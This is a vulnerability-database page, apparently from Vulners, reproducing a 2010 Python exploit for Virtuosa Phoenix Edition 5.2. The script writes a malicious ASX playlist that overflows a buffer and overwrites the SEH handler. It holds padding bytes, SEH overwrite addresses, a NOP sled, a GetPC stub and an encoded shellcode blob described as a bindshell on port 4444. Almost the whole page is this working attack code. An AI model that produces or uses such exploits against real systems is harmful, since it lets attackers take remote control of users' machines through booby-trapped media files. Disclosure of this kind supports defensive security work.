Virtuosa Phoenix Edition 5.2 ASX SEH BOF

🗓️ 01 Jul 2014 00:00:00Reported by RootType

-Virtuosa Phoenix Edition 5.2 ASX SEH BOF with Exploit Title, Author, Tested on Windows XP SP


                                                #!/usr/bin/python

# Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite 
# Date found: Aug 16th 2010
# Author: Acidgen
# Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe
# Version: 5.2
# Tested on: Windows XP SP2
# Virtuosa - File &#62; Import  &#62; Import song or video file from Playlists

junkA = &#39;\x41&#39; * 1021
junkB = &#39;\x42&#39; * 8979
nSEH  = &#39;\xeb\x06\xff\xff&#39;
SEH   = &#39;\x7e\xaa\x01\x10&#39;
nop = &#39;\x90&#39; * 10
getpc=&#34;\xd9\xeb\x9b\xd9\x74\x24\xf4\x5b&#34;
addebx=&#34;\x83\xc3\x0b&#34;
# Bindshell port 4444
sc = (&#34;j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upjb4c94oe246b3gk53590ofo4317dn40x081dkb19056k05oe8elx2c0e64j810ng4g0b2864mx716d5b7g2k0f1g7f8g2x7cmd58k809jfmxj19emx3g8x0b0269lejg82mg3b800bk3n90f4b2xj0o543689xkc82jb5xjg84l0619e7x29214enb930482mf817x7b0d1e0e130bj4jxj3obk95flb3k0b1b7x0e90j9m55b0dm08f8cj29c105cm0m9kk53n088n1nx6kn82fjf994d645xm4lk1k94kx44ng5e1e4bm81xm4jg1goxo1o344k9kd7b4f72l554o3jdje791xj0n002lbm9m15c8glejfk1kd9bm23f432d40858kj18e809f5bob1x285f6k9xkgldm15f49j5o30b52jdjb2xk26089jejg0km30xn3595kjbkdlx4191o1o42d817gmfj82520kf2djb744do338j28fnf7c13782e7152mf21ndm0nf0860k22301odlej3n0154dk27g3f3kj10k3k835919kdkxob28o09c9892kgm9lencl31ekgnemg756c5x841b4dlk734k945k60k3m910jejd1boe349d7b58mk530gkgob58ok085kjk7g492e4d228e8260jbl809l17do43f2d832g648x9b7929437f38k4j45242o099803f5&#34;)
asxheader=(&#34;&#60;ASX version = &#39;3.0&#39;&#62;&#34; + &#34;\r\n&#34;
&#34;&#60;Title&#62;ASX BOF SEH Overwrite Exploit&#60;/Title&#62;&#34; + &#34;\r\n&#34;
&#34;&#60;Abstract&#62;Perhaps it is, what do you think?&#60;/Abstract&#62;&#34; +&#34;\r\n&#34;
&#34;&#60;MoreInfo href = &#39;http://google.com&#34; + &#34;\r\n&#34;
&#34;\r\n&#34;
&#34;&#60;Entry&#62;&#34; + &#34;\r\n&#34;
&#34;&#60;Title&#62;How the hacker took over Virtuosa&#60;/Title&#62;&#34; + &#34;\r\n&#34;
&#34;&#60;Author&#62;Lucas Lundgren - acidgen [at] grayhat [onedot] se&#60;/Author&#62;&#34; + &#34;\r\n&#34;
&#39;&#60;Ref href=&#34;&#39;+junkA+nSEH+SEH+nop+getpc+addebx+sc+junkB+&#39;&#34;&#39;+&#34;/&#62;&#34; + &#34;\r\n&#34;
&#34;&#60;/Entry&#62;&#34;+&#34;\r\n&#34;
&#34;&#60;/ASX&#62;&#34;
&#34;\r\n\r\n&#34;)
filename = &#34;asxcrash.asx&#34;
print &#34;[-]Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite&#34;
print &#34;[*]Generating exploit...\n&#34;
file = open(filename,&#34;w&#34;)
file.writelines(asxheader)
file.close()
print &#34;[*]Done...\n&#34;

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1